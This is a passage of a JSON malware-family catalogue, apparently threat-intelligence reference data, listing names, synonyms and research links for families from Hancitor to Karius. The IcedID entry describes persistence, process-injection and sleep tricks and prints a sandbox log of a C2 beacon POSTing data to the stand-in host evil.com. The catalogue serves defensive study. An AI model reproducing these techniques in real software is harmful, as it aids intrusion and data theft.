"https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" ], "synonyms": [ "Chanitor" ], "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", "value": "Hancitor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" ], "synonyms": [], "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" ], "synonyms": [ "Piptea" ], "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", "value": "Havex RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ "Predator Pain" ], "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", "value": "Helminth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" ], "synonyms": [], "type": [] }, "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", "value": "Heloag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" ], "synonyms": [], "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", "value": "Herbst" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", "value": "Heriplor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", "value": "Hermes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", "value": "Hermes Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" ], "synonyms": [], "type": [] }, "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", "value": "HerpesBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" ], "synonyms": [], "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", "value": "HesperBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://twitter.com/struppigel/status/950787783353884672", "https://github.com/goliate/hidden-tear" ], "synonyms": [], "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", "value": "HiKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" ], "synonyms": [], "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", "value": "Hi-Zor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" ], "synonyms": [], "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", "value": "HLUX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" ], "synonyms": [], "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", "value": "HtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", "https://www.riskiq.com/blog/labs/htprat/" ], "synonyms": [], "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", "value": "htpRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://www.secureworks.com/research/htran" ], "synonyms": [ "HUC Packet Transmit Tool" ], "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", "value": "HTran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" ], "synonyms": [], "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", "value": "HttpBrowser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [ "httpdr0pper" ], "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", "value": "httpdropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", "value": "http_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" ], "synonyms": [ "houdini" ], "type": [] }, "uuid": "94466a80-964f-467e-b4b3-0e1375174464", "value": "Hworm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "https://securelist.com/luckymouse-hits-national-data-center/86083/" ], "synonyms": [], "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", "value": "HyperBro" }, { "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" ], "synonyms": [ "BokBot" ], "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", "value": "IcedID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/" ], "synonyms": [], "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", "value": "IcedID Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "http://www.kz-cert.kz/page/502" ], "synonyms": [], "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", "value": "Icefog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" ], "synonyms": [], "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", "value": "Ice IX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" ], "synonyms": [], "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", "value": "IDKEY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" ], "synonyms": [], "type": [] }, "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", "value": "IISniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", "value": "Imecab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", "value": "Imminent Monitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" ], "synonyms": [ "Foudre" ], "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", "value": "Infy" }, { "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" ], "synonyms": [], "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", "value": "InnaputRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" ], "synonyms": [], "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", "https://lokalhost.pl/gozi_tree.txt", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" ], "synonyms": [ "Gozi ISFB", "IAP", "Pandemyia" ], "type": [] }, "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", "value": "ISFB" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", "http://www.clearskysec.com/ismagent/" ], "synonyms": [], "type": [] }, "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", "value": "ISMAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", "http://www.clearskysec.com/greenbug/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", "value": "ISMDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", "https://www.zscaler.com/blogs/research/ispy-keylogger" ], "synonyms": [], "type": [] }, "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" ], "synonyms": [], "type": [] }, "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", "value": "ISR Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", "value": "IsSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" ], "synonyms": [], "type": [] }, "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", "value": "JackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", "value": "Jaff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" ], "synonyms": [], "type": [] }, "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", "value": "Jager Decryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ "Reconcyc" ], "type": [] }, "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" ], "synonyms": [], "type": [] }, "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", "value": "Jigsaw" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [], "type": [] }, "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", "value": "Jimmy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", "value": "Joanap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" ], "synonyms": [], "type": [] }, "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", "value": "Joao" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" ], "synonyms": [], "type": [] }, "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", "value": "Jolob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", "http://marcmaiffret.com/vault7/" ], "synonyms": [], "type": [] }, "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", "value": "JQJSNICKER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" ], "synonyms": [], "type": [] }, "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", "value": "JripBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", "value": "KAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", "value": "Karagany" }, { "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" ], "synonyms": [], "type": [] }, "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", "value": "Kardon Loader" }, { "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate 